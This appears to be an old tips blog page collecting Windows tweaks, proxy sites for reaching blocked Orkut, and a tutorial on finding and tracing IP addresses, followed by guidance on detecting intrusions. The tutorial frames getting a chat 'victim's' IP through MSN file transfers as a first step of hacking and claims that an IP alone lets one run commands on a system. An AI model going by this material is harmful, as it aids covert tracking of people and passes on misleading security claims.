GOOD LUCK SE AIRTEL USERS

0 comments  

Hide Drives for security & Privacy

This is a great trick you can play on your friends. To disable the display of local or networked drives when you click My Computer.

1.Go to start->run.Type regedit.Now go to:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Now in the right pane
create a new DWORD item and name it NoDrives (it is case sensitive).
Now modify it's value and set it to 3FFFFFF (Hexadecimal) .
Now restart your computer.
So, now when you click on My Computer, no drives will be shown(all gone...).

To enable display of drives in My Computer, simply delete this DWORD item that you created.Again restart your computer.You can now see all the drives again.

0 comments  

Remove "Thumbs.db". A Nice Trick

Thumb.db is a cache of the current picture in any directory that contains Picture files for example: .jpeg. To remove it ,navigate to:
1> open "WINDOWS EXPLORER".
2>go to "TOOLS".
3>open "FOLDER OPTIONS".
4>go to "VIEW".
5>see 1st section "FILES & FOLDERS".
6>click on the "DO NOT CACHE THUMBNAILS".
Now the thumbnail file will be removed from your computer once u do this the file will be never created.

0 comments  

SURF ORKUT WHERE IT IS BLOCKED

  Here are some proxy website links using which you can browse not only orkut but many other sites. Proxy sites are the websites, that hide your web identity from other websites. Mainly Ip address is Hidden
 
www.mathtunnel.com
www.gravitywars.com
www.kproxy.com
www.calculatepie.com
www.anonymizer.com
 

Open the above sites and just type in www.orkut.com in companies or colleges where its blocked n enjoy.

0 comments  

ACCESS INTERNET THROUGH UR MS CALCULATOR

This trick will allow you to access internet through Calculator. Calculator can be used as a web browser.

1. Open your MS Calculator. This is normally found in Start => All Programs => Accessories => Calculator.

2. Open the help-window by pressing the F1 key.

3. Click the top-left corner icon of the help window once (Standard is a Document with a Question mark).

4. Select Go to URL-address.

5. Type your address into the available field, but remember to type http:// and not just www. (or equivalent).

0 comments  

Multi Google Talk Login without any software

      Just follow the simple steps Below:
1) Right click on the Google Talk shortcut.
2) click on Properties.
3) Go to Shortcut tab on Google Talk Properties window.
4) On the Target textbox, add in the /nomutex to the end of the line so that it looks like below (or you can simply copy and paste the below syntax and replace the original).
“c:\program files\google\google talk\googletalk.exe” /nomutex
5) Click on OK.
  I didn't have to do anything after this and clicking on the shortcut multiple times just gave me different Google talk window.


Alternative

To create a new shortcut for Google Talk:

1) Right-click on the desktop or anywhere you want to place the GTalk shortcut.
2) Select New on the right click context menu.
3) Then select Shortcut.
4) Copy and paste the following line to the text box when prompted to type the location of the item:
“c:\program files\google\google talk\googletalk.exe” /nomutex

5) Click on Next.
6) Give the shortcut a proper name such as Google Talk or Google
Talk Multiple or Google Talk Polygamy.
7) Click OK until you are done.

0 comments  

Hack your broadband

Hack Your Broadband Connection.
Basically after getting to the hidden config settings you set the browser to request more data that it usually does.
Step 1:
Type "about:config" into the address bar and hit enter. Scroll down and look for the following entries:
network.http.pipelining
network.http.proxy.pipelining n
etwork.http.pipelining.maxrequests
Normally the browser will make one request to a web page at a time. When you enable pipelining it will make several at once, which really speeds up page loading.

Step 2:
Alter the entries as follows:
Set "network.http.pipelining" to "true"
Set "network.http.proxy.pipelining" to "true"
Set "network.http.pipelining.maxrequests " to some number like 30.
This means it will make 30 requests at once.

Step 3:
Lastly right-click anywhere and select New-> Integer.
Name it
"nglayout.initialpaint.delay" and set its value to "0".
This value is the amount of time the browser waits before it acts on information it receives.

0 comments  

Hacking IP address

What is IP and how to get the IP of a remote system::
Getting the IP or Internet Protocol of a remote system is the most important and the first step of hacking into it. Probably it is the first thing a hacker do to get info for researching on a system. Well IP is a unique number assigned to each computer on a network. It is this unique address which represents the system on the network. Generally the IP of a particular system changes each time you log on to the network by dialing to your ISP and it is assigned to you by your ISP. IP of a system which is always on the network remains generally the same. Generally those kind of systems are most likely to suffer a hacking attack because of its stable IP. Using IP you can even execute system commands on the victim's computer.
Lets take the example of the following IP address: 202.144.49.110 Now the first part, the numbers before the first decimal i.e. 209 is the Network number or the Network Prefix.. This means that it identifies the number of the network in which the host is. The second part i.e. 144 is the Host Number that is it identifies the number of the host within the Network. This means that in the same Network, the network number is same. In order to provide flexibility in the size of the Network, here are different classes of IP addresses:
Address Class Dotted Decimal Notation Ranges
Class A ( /8 Prefixes) 1.xxx.xxx.xxx through 126.xxx.xxx.xxx
Class B ( /16 Prefixes) 128.0.xxx.xxx through 191.255.xxx.xxx
Class C ( /24 Prefixes) 192.0.0.xxx through 223.255.255.xxx
The various classes will be clearer after reading the next few lines.
Each Class A Network Address contains a 8 bit Network Prefix followed by a 24-bit host number. They are considered to be primitive. They are referred to as "/8''s" or just "8's" as they have an 8-bit Network prefix.
In a Class B Network Address there is a 16 bit Network Prefix followed by a 16-bit Host number. It is referred to as "16's".
A class C Network address contains a 24-bit Network Prefix and a 8 bit Host number. It is referred to as
"24's" and is commonly used by most ISP's.
Due to the growing size of the Internet the Network Administrators faced many problems. The Internet routing tables were beginning to grow and now the administrators had to request another network number from the Internet before a new network could be installed at their site. This is where sub-netting came in.
Now if your ISP is a big one and if it provides you with dynamic IP addresses then you will most probably see that whenever you log on to the net, your IP address will have the same first 24 bits and only the last 8 bits will keep changing. This is due to the fact that when sub-netting comes in then the IP Addresses structure becomes:
xxx.xxx.zzz.yyy
where the first 2 parts are Network Prefix numbers and the zzz is the Subnet number and the yyy is the host number. So you are always connected to the same Subnet within the same Network. As a result the first 3 parts will remain the same and only the last part i.e. yyy is variable.
***********************
For Example, if say an ISP xyz is given the IP: 203.98.12.xx Network address then you can be awarded any IP, whose first three fields are 203.98.12. Get it?
So, basically this means that each ISP has a particular range in which to allocate all its subscribers. Or in other words, all subscribers or all people connected to the internet using the same ISP, will have to be in this range. This in effect would mean that all people using the same ISP are likely to have the same first three fields of their IP Addresses.
This means that if you have done a lot of (By this I really mean a lot) of research, then you could figure out which ISP a person is using by simply looking at his IP. The ISP name could then be used to figure out the city and the country of the person. Right? Let me take an example to stress as to how cumbersome but easy (once the research is done) the above method can be.
In my country, say there are three main ISP's:
ISP Name Network Address Allotted
ISP I 203.94.47.xx
ISP II 202.92.12.xx
ISP III 203.91.35.xx
Now, if I get to know the IP of an e-pal of mine, and it reads: 203.91.35.12, then I can pretty easily figure out that he uses ISP III to connect to the internet. Right? You might say that any idiot would be able to do this. Well, yes and no. You see, the above method of finding out the ISP of a person was successful only because we already had the ISP and Network Address Allotted list with us. So, what my point is, that the above method can be successful only after a lot of research and experimentation. And, I do think such research can be helpful sometimes.
Also, this would not work, if you take it all on in larger scale. What if the IP that you have belongs to someone living in a remote igloo in the North Pole? You could not possibly get the Network Addresses of all the ISP's in the world, could you? If yes please send it to me J.
Well now I guess you have pretty good knowledge about what an IP is and what you can do by knowing the IP of a remote system. Now lets come to the point of finding out the IP of remote system.
Well you can easily figure out the IP of a remote system using the netstat utility available in the microsoft's version of DOS. The netstat command shows the connections in which your system is engaged to and the ports they are using. Suppose you are checking your mail in hotmail and you want to find out the IP of msn. All you need to do is to open a dos window (command.com) and type netstat. You will see all the open connections of your system. There you will see something :
Proto Local Address Foreign Address State
TCP abhisek:1031 64.4.xx.xx:80 ESTABLISHED
Now you got the IP address of hotmail ass 64.4.xx.xx .
Similarly you can figure out the IP address of most http or ftp connections.
To know your own IP type the following command in a dos windows
C:\netstat –n
[this commands converts the IP name into IP addresses]
this is what you will probably see on typing the above command :
Proto Local Address Foreign Address State
TCP 203.xx.251.161:1031 194.1.129.227:21 ESTABLISHED
TCP 203.xx.251.161:1043 207.138.41.181:80 FIN_WAIT_2
TCP 203.xx.251.161:1053 203.94.243.71:110 TIME_WAIT
TCP 203.xx.251.161:1058 194.1.129.227:20 TIME_WAIT
TCP 203.xx.251.161:1069 203.94.243.71:110 TIME_WAIT
TCP 203.xx.251.161:1071 194.98.93.244:80 ESTABLISHED
TCP 203.xx.251.161:1078 203.94.243.71:110 TIME_WAIT
Here 203.xx.251.161 is your IP address.
Now lets clarify the format used by netstat :
Proto : It shows the type of protocol the connection with the remote system is using.
Here TCP (transmission control protocol) is the protocol used by my system to connect to other systems.
Local Address : It shows the local address ie the local IP. When the netstat command is executed without –n switch then the name of the local system is displayed and when the netstat is executed with –n switch then the IP of the local system is displayed. Here you can also find out the port used by the connection.
xxx.yyy.zzz.aaa:1024
in this format you will see the local address. Here 1024 is the port to which the remote system is connected in your system
Foreign Address :: It shows the IP address of the remote system to which your system is connected. In this case also if the netstat command is excuted with –n switch then you directly get the IP of the victim but if the netstat is executed without –n switch then you will get the address of the remote system. Something like
C:\netstat
Proto Local Address Foreign Address State
TCP abhisek:1031 msgr.lw4.gs681.hotmail.com:80 ESTABLISHED<
Here msgr.lw4.gs681.hotmail.com is the address of the foreign system . putting this address in any IP lookup program and doing a whois lookup will reveal the IP of the remote system.
Note: The port to which your system is connected can be found from this in the same way as I have shown in the case of local address. The difference is that, this is the port of the remote system to which your computer is connected to.
Below I have produced a list of ports and popular services generally found to be running.
21 :: FTP port
80 :: http port
23 :: Telnet port
25 :: SMTP
Note: If your execute the netstat command and find ports like 12345,27374 are open and are in use then make it sure that your sweat heart computer is infected with her boyfriend.. J J J J I mean your computer is infected with some sort of Trojan.
Below I have produced a list of commonly known Trojans and the ports they use by default. So if you find these ports open then get a good virus buster and get these stupid servers of the Trojans kicked out. Well if you want to play with these Trojan by keeping them in your computer but not letting them ruin your system performance then just disble it from the system registry run and they wont be loaded to memory each time when windows starts up[This trick doesn't work for all Trojans].
Netbus :: 12345(TCP)
Subseven :: 27374(TCP)
Girl Friend :: 21554(TCP)
Back Oriface :: 31337 (UDP)
Well guys and gals I hope you are now well familiar with the term IP and what is the utility of IP in cyber world and how to get the IP of a remote system to which you are connected. I hope you find my writings very easy to undertstand. I know I lack the capacity of explaining myself but I try my level best to make things very easy and clear for you'll.
How to get the IP of a remote system while chatting through msn messenger ::
This is a tutorial on how to get IP address from MSN messenger. This is actually
a really easy thing to do. It is not like going through the hard time and reversing
MSN messenger like many people think.
The IP address is only given when you accept or are sending a file through MSN
messenger. When you send IM's, the message is sent through the server thus hiding
your victims IP and your. But when you send a file or recieve a file, it is direct
connection between the two computers.
To obtain the IP accept a file transfer or send a file to the victim, when the file
sending is under way from the dos prompt type "netstat" without the quotation marks.
You should get a table like this:
Proto Local Address Foreign Address State
TCP kick:1033 msgr-ns29.msgr.hotmail.com:1863 ESTABLISHED
TCP kick:1040 msgr-sb36.msgr.hotmail.com:1863 ESTABLISHED
TCP kick: ESTABLISHED
The top name in the list is the server's address for IMing. There could be many of
the second name in the list, as a new connection is made to the server for every
room you are IMing to. You are looking for the address of the remote host in
this table it may be something similar to "host63-7-102-226.ppp.cal.vsnl.com" or "203..64.90.6".
without the quotation marks.
All you need to do now is to put this address in you IP lookup programe and get the IP of the remote system.
Well 50%of the work is done now. Now you know how to get the IP of a remote system, so its time to trace it down and find some details about the IP.
Tracing an IP is quite simple. You can do it the easy way by using some sweet softwares like Visual Trace 6.0b
[ftp://ftp.visualware.com/pub/vr/vr.exe]
Neotrace
[http://www.neoworx.com/download/NTX325.exe]
or by our way ie. Using MS DOS or any other version of DOS.
Well I suggest you to use DOS and its tracert tool for tracing the IP cause using it will give you a clear conception about the art of tracing an IP and I guarantee that you will feel much satisfied on success than using a silly software. Furthur you will know how things work and how the IP is traced down and the different networks associated in this tracing process.
Let us take a look at tracert tool provided for DOS by Microsoft.
It is a very handy tool for peoples need to trace down an IP.
Just open any DOS windows and type tracert.
C:\windows>tracert
Usage: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name
Options:
-d Do not resolve addresses to hostnamess.
-h maximum_hops Maximum number of hops tto search for target.
-j host-list Loose source route along hoost-list.
-w timeout Wait timeout milliseconds forr each reply.
You will now see a description of the tracert command and the switches associated with it.
Well these switches doesn't makes much difference. All you can do is to increase the timeout in milliseconds by using –w switch if you are using a slow connection and the –d switch if you wish not resolve address to hostnames by default.
By default tracert performs a maximum of 30 hops trace. Using the –h switch you can specify the number of hops to perform.
Now its time for execution.
Let us trace down the IP yahoo.com [216.115.108.243]
TIP: If you have done a long research (I mean a lot) then simply looking at the IP you can figure out some info from it. For example the IP 203.90.68.8 indicates that the system is in India. In India IPs generally begin with 203 and 202
C:\WINDOWS>tracert yahoo.com
Tracing route to yahoo.com [216.115.108.243] over a maximum of 30 hops:
1 308 ms 142 ms 127 ms 203.94.246.35
2 140 ms 135 ms * 203.94.246.1
3 213 ms 134 ms 132 ms 203.94.255.33
4 134 ms 130 ms 129 ms 203.200.64.29
5 122 ms 135 ms 131 ms 203.200.87.75
6 141 ms 137 ms 121 ms 203.200.87.15
7 143 ms 170 ms 154 ms vsb-delhi-stm1.Bbone.vsnl.net.in [202.54.2.241]
8 565 ms 589 ms 568 ms if-7-0.bb8.NewYork.Teleglobe.net [207.45.198.65]
9 596 ms 584 ms 600 ms if-3-0.core2.NewYork.teleglobe.net [207.45.221.66]
10 * * * Request timed out.
11 703 ms 701 ms 719 ms if-3-0.core2.PaloAlto.Teleglobe.net [64.86.83.205]
12 694 ms 683 ms 681 ms if-6-1.core1.PaloAlto.Teleglobe.net [207.45.202.33]
13 656 ms 677 ms 700 ms ix-5-0.core1.PaloAlto.Teleglobe.net [207.45.196.90]
14 667 ms 673 ms 673 ms ge-1-3-0.msr1.pao.yahoo.com [216.115.100.150]
15 653 ms 673 ms 673 ms vl20.bas1.snv.yahoo.com [216.115.100.225]
16 666 ms 676 ms 674 ms yahoo.com [216.115.108.243]
Trace complete.
Note: Here I have traced yahoo.com. In place of yahoo.com you can give the IP of yahoo or any other IP you want to trace, the result will be the same.
Now carefully looking at the results you can figure out many information about yahoo's server [216.115.108.243]
First packets of data leave my ISP which is at 203.94.246.35 .Similarly you can find out the different routers through which the packets of data are send and received to and from the target system. Now take a look at the 13th line you'll see that the router is in PaloAlto.Teleglobe.net from this you can easily figure out that the router is in Palo Alto. Now finally look at the target system ie. Yahoo's server vl20.bas1.snv.yahoo.com . Now you got the address of yahoo's server. Now put this address in any IP lookup programe and perform and reverse DNS lookup and you will get most of the info about this address,like the place where it is in.
Well another thing you can find out using the tracert tool is that the number of hops (routers) the target system is away from you. In case of tracerouting yahoo.com we find that the target system ie yahoo's server is 16 hops away from my system. This indicates that there are 16 routers between my system and yahoo's server.
Apart from tracing an IP you can find out many usefull details about the target system using the tracert tool.
Firewall Detection
While tracerouting a target system, if you get * as an output then it indicates timeout error. Now if you peform another tracerout to the same taeget system at some other time with a good connection and in this way few times more and if you always get * as the output then take it for sure that the target system is running a firewall which prevents sending of data packets from the target system.
Example
Some days ago I tried to tracert hotmail's server in plain and simple way using tracert without any trick.This is what I found out :
c:\windows>tracert 64.4.53.7
Tracing route to lc2.law5.hotmail.com [64.4.53.7]
over a maximum of 30 hops:

1 * * * Request timed out.
2 161 ms 147 ms 85 ms 203.90.69.81
3 126 ms 261 ms 219 ms 203.90.66.9
4 121 ms 115 ms 228 ms delswp2.hclinfinet.com [203.90.66.133]
5 727 ms 725 ms 711 ms 203-195-147-250.now-india.net.in [203.195.147.250]
6 1006 ms 794 ms 952 ms core-fae-0-0.now-india.net.in [203.195.147.3]
7 826 ms 731 ms 819 ms 213.232.106.9
8 885 ms 744 ms 930 ms 213.166.3.209
9 851 ms 1020 ms 1080 ms 213.232.64.54
10 1448 ms 765 ms 1114 ms pos8-0.core2.London1.Level3.net [212.113.0.118]
11 748 ms 789 ms 750 ms ge-4-2-1.mp2.London1.Level3.net [212.187.131.146]
12 719 ms 733 ms 846 ms so-3-0-0.mp1.London2.Level3.net [212.187.128.46]
13 775 ms 890 ms 829 ms so-1-0-0.mp2.Weehawken1.Level3.net [212.187.128.138]
14 853 ms 852 ms 823 ms so-3-0-0.mp1.SanJose1.Level3.net [64.159.1.129]
15 889 ms 816 ms 803 ms so-7-0-0.gar1.SanJose1.Level3.net [64.159.1.74]
16 * * * Request timed out.
17 * * * Request timed out.
18 * * * Request timed out.
19 * * * Request timed out.
20 * * * Request timed out.
21 * * * Request timed out.
22 * * * Request timed out.
23 * * * Request timed out.
24 * * * Request timed out.
25 * * * Request timed out.
26 * * * Request timed out.
27 * * * Request timed out.
28 * * * Request timed out.
29 * * * Request timed out.
30 * * * Request timed out.
Trace complete.
I performed the same tracert many times a day but concluded with the same result. This indicates that the systems after the router SanJose1.Level3.net has firewalls installed which prevents the outgoing of data packets.
Detecting Traceroute Attempts on your System
You can detect that an attacker is performing a traceroute on your system, if you see the following symptoms:
1. If you observe port scans on very high UDP ports. This symptom means that the attacker has performed a traceroute on your system. However, it could also mean a simply port scan. Either way, it signifies the fact that your system is being scanned.
2. If the packet-monitoring tool installed in your network, picks up several outgoing TTL-exceeding messages, then it is yet another sign that someone is doing a traceroute on your system.
3. If in these log files, you also observer an outgoing ICMP port unreachable error message, then it means that since a traceroute was done on your system and as the target system i.e. your system, was reached, it responded with this error message.
You can also find our more information on the attacker (if he performs a traceroute on your system) by simply studying the sniffer log files. If you observer the TTL values, then we can easily figure out the following information on the attacker by making use of OS detection techniques discussed earlier in this white paper:
The Operating System running on the attacker's target system.
Number of hops away, the attacker is from you.

0 comments  

How to Detect a Hacker Attack

Most computer vulnerabilities can be exploited in a variety of ways. Hacker attacks may use a single specific exploit, several exploits at the same time, a misconfiguration in one of the system components or even a backdoor from an earlier attack. Due to this, detecting hacker attacks is not an easy task, especially for an inexperienced user. This article gives a few basic guidelines to help you figure out either if your machine is under attack or if the security of your system has been compromised. Keep in mind just like with viruses, there is no 100% guarantee you will detect a hacker attack this way. However, there's a good chance that if your system has been hacked, it will display one or more of the following behaviours.

Windows machines :

  • Suspiciously high outgoing network traffic. If you are on a dial-up account or using ADSL and notice an unusually high volume of outgoing network (traffic especially when you computer is idle or not necessarily uploading data), then it is possible that your computer has been compromised. Your computer may be being used either to send spam or by a network worm which is replicating and sending copies of itself. For cable connections, this is less relevant - it is quite common to have the same amount of outgoing traffic as incoming traffic even if you are doing nothing more than browsing sites or downloading data from the Internet.
  • Increased disk activity or suspicious looking files in the root directories of any drives. After hacking into a system, many hackers run a massive scan for any interesting documents or files containing passwords or logins for bank or epayment accounts such as PayPal. Similarly, some worms search the disk for files containing email addresses to use for propagation. If you notice major disk activity even when the system is idle in conjunction with suspiciously named files in common folders, this may be an indication of a system hack or malware infection.
  • Large number of packets which come from a single address being stopped by a personal firewall. After locating a target (eg. a company's IP range or a pool of home cable users) hackers usually run automated probing tools which try to use various exploits to break into the system. If you run a personal firewall (a fundamental element in protecting against hacker attacks) and notice an unusually high number of stopped packets coming from the same address then this is a good indication that your machine is under attack. The good news is that if your personal firewall is reporting these attacks, you are probably safe. However, depending on how many services you expose to the Internet, the personal firewall may fail to protect you against an attack directed at a specific FTP service running on your system which has been made accessible to all. In this case, the solution is to block the offending IP temporarily until the connection attempts stop. Many personal firewalls and IDSs have such a feature built in.
  • Your resident antivirus suddenly starts reporting that backdoors or trojans have been detected, even if you have not done anything out of the ordinary. Although hacker attacks can be complex and innovative, many rely on known trojans or backdoors to gain full access to a compromised system. If the resident component of your antivirus is detecting and reporting such malware, this may be an indication that your system can be accessed from outside.

Unix machines:

  • Suspiciously named files in the /tmp folder. Many exploits in the Unix world rely on creating temporary files in the /tmp standard folder which are not always deleted after the system hack. The same is true for some worms known to infect Unix systems; they recompile themselves in the /tmp folder and use it as 'home'.
  • Modified system binaries such as 'login', 'telnet', 'ftp', 'finger' or more complex daemons, 'sshd', 'ftpd' and the like. After breaking into a system, a hacker usually attempts to secure access by planting a backdoor in one of the daemons with direct access from the Internet, or by modifying standard system utilities which are used to connect to other systems. The modified binaries are usually part of a rootkit and generally, are 'stealthed' against direct simple inspection. In all cases, it is a good idea to maintain a database of checksums for every system utility and periodically verify them with the system offline, in single user mode.
  • Modified /etc/passwd, /etc/shadow, or other system files in the /etc folder. Sometimes hacker attacks may add a new user in /etc/passwd which can be remotely logged in a later date. Look for any suspicious usernames in the password file and monitor all additions, especially on a multi-user system.
  • Suspicious services added to /etc/services. Opening a backdoor in a Unix system is sometimes a matter of adding two text lines. This is accomplished by modifying /etc/services as well as /etc/ined.conf. Closely monitor these two files for any additions which may indicate a backdoor bound to an unused or suspicious port.

0 comments